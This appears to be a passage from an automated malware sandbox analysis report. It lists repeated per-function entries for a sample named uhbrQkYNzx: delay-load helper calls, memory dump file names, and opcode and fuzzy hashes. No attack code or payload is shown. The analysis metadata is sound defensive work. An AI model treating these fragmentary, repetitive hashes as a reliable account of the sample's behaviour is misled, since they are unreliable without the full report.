                                                              • Opcode ID: b34e988c1b96367f25e73d8dcd346ee1fabd88473b60ecc61acaa5fd1fcf80c9
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: b34e988c1b96367f25e73d8dcd346ee1fabd88473b60ecc61acaa5fd1fcf80c9
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B49E4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3ce48ef2c226bd28b8b81efbe30c46c4b8c5e209fa95ea3e353f715416d99784
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 3ce48ef2c226bd28b8b81efbe30c46c4b8c5e209fa95ea3e353f715416d99784
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B4976 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a605d92a136cd03d59def37654e23f5405837fadd37ae84e72cb72041e76fd21
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: a605d92a136cd03d59def37654e23f5405837fadd37ae84e72cb72041e76fd21
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B4A02 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ec417415dda37bbd5795a5ca72bbb03002d082831293154613bb8114655ece67
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: ec417415dda37bbd5795a5ca72bbb03002d082831293154613bb8114655ece67
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              Function 009B4B85 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9aeda9440e127c6fd35c64c34b7cffaae105f9b8a26870f22f292d214f702a6e
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: 9aeda9440e127c6fd35c64c34b7cffaae105f9b8a26870f22f292d214f702a6e
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              Function 009B4B2E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 176c598623f513ecbfbe2bb34c4a0728e26aa132cbbaa55a3faf30bb55cc1cd6
                                                              • Instruction ID: dd57fdc5028f6b5b2c03e3a5912ea1a8ea4201d9d0477ace7d98805462b7e0c1
                                                              • Opcode Fuzzy Hash: 176c598623f513ecbfbe2bb34c4a0728e26aa132cbbaa55a3faf30bb55cc1cd6
                                                              • Instruction Fuzzy Hash: 16A001962ED1617C31086296AF07EBB521EC8E1B39331AA1BF611D718BA89459952431
                                                              Function 009B4B53 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f5c147c6afb56decb4fd2ee3866f3f43ddd9d0c708fac419759d80e1d4416dde
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: f5c147c6afb56decb4fd2ee3866f3f43ddd9d0c708fac419759d80e1d4416dde
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              Function 009B4B49 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: af2989ee35fcf4f3b9ab43958d4bdccafc1c3f95bad9b5fad136e16249f053ad
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: af2989ee35fcf4f3b9ab43958d4bdccafc1c3f95bad9b5fad136e16249f053ad
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              Function 009B4B7B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 049f008e933ad10a4d0f6501a96bc9c624f7eae6575794ac1fe8c14437e8ee7e
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: 049f008e933ad10a4d0f6501a96bc9c624f7eae6575794ac1fe8c14437e8ee7e
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              Function 009B4B71 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c20e3fa147035b4fc766f442ce3cca91d7dffeb94b59dd1ae44581f9f05a6a1c
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: c20e3fa147035b4fc766f442ce3cca91d7dffeb94b59dd1ae44581f9f05a6a1c
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              Function 009B4CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0ec2102a4c06b7cf7866c502d6ff171c781b21970c7fcad2e4f43024bcaf6062
                                                              • Instruction ID: 484f84d88ea3af86700533fb5fb7a5748205a64ba28f042905926ee1d6eee47d
                                                              • Opcode Fuzzy Hash: 0ec2102a4c06b7cf7866c502d6ff171c781b21970c7fcad2e4f43024bcaf6062
                                                              • Instruction Fuzzy Hash: EFA001962EE156BC350862916F06DBA461EC5C5F753328A1BF552D6583A88418952036
                                                              Function 009B4CDA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ba76c1998f0ab70bcf855e90bb059919bd307b4700a83f198d0239ebfc02920a
                                                              • Instruction ID: 484f84d88ea3af86700533fb5fb7a5748205a64ba28f042905926ee1d6eee47d
                                                              • Opcode Fuzzy Hash: ba76c1998f0ab70bcf855e90bb059919bd307b4700a83f198d0239ebfc02920a
                                                              • Instruction Fuzzy Hash: EFA001962EE156BC350862916F06DBA461EC5C5F753328A1BF552D6583A88418952036
                                                              Function 009B4CD0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 170ce63e20b9e1cc7d5e66b4da523d4342c73cce69eede86a703ec2a8386ee2c
                                                              • Instruction ID: 484f84d88ea3af86700533fb5fb7a5748205a64ba28f042905926ee1d6eee47d
                                                              • Opcode Fuzzy Hash: 170ce63e20b9e1cc7d5e66b4da523d4342c73cce69eede86a703ec2a8386ee2c
                                                              • Instruction Fuzzy Hash: EFA001962EE156BC350862916F06DBA461EC5C5F753328A1BF552D6583A88418952036
                                                              Function 009B4CC6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f2bbb8178444cd206430379017c8af6ab3d11bcdc829dbb5e749d682d35b90f0
                                                              • Instruction ID: 484f84d88ea3af86700533fb5fb7a5748205a64ba28f042905926ee1d6eee47d
                                                              • Opcode Fuzzy Hash: f2bbb8178444cd206430379017c8af6ab3d11bcdc829dbb5e749d682d35b90f0
                                                              • Instruction Fuzzy Hash: EFA001962EE156BC350862916F06DBA461EC5C5F753328A1BF552D6583A88418952036
                                                              Function 009B4CFF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a54dca3fd4a2ad14a0f58dac33ba6cec3e317a776d7a0711d13c063b0a446617
                                                              • Instruction ID: b9006df9b8dfb07ced63fe7fadc4586469da836c301d00f9b8b5b4b841c7375e
                                                              • Opcode Fuzzy Hash: a54dca3fd4a2ad14a0f58dac33ba6cec3e317a776d7a0711d13c063b0a446617
                                                              • Instruction Fuzzy Hash: F3A0019A2EE552BC310862916F06DBA562ED4D5F753318A2BF552C6183A98528992031
                                                              Function 009B4CE4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 73190fa0946dbe69fb103e7b437957b64d3fc9b2302a04fb8006f582c1b08fc3
                                                              • Instruction ID: b273d94568cf33382bd2655935b2d67206e3128400a6b29c90026116991c5409
                                                              • Opcode Fuzzy Hash: 73190fa0946dbe69fb103e7b437957b64d3fc9b2302a04fb8006f582c1b08fc3
                                                              • Instruction Fuzzy Hash: F9A0118A2EE002BC300822802F02CBA022EC0C0F303308A2BF000C2083A88028882030
                                                              Function 00991DE7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetDlgItemTextW.USER32(?,?,?), ref: 00991DFC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
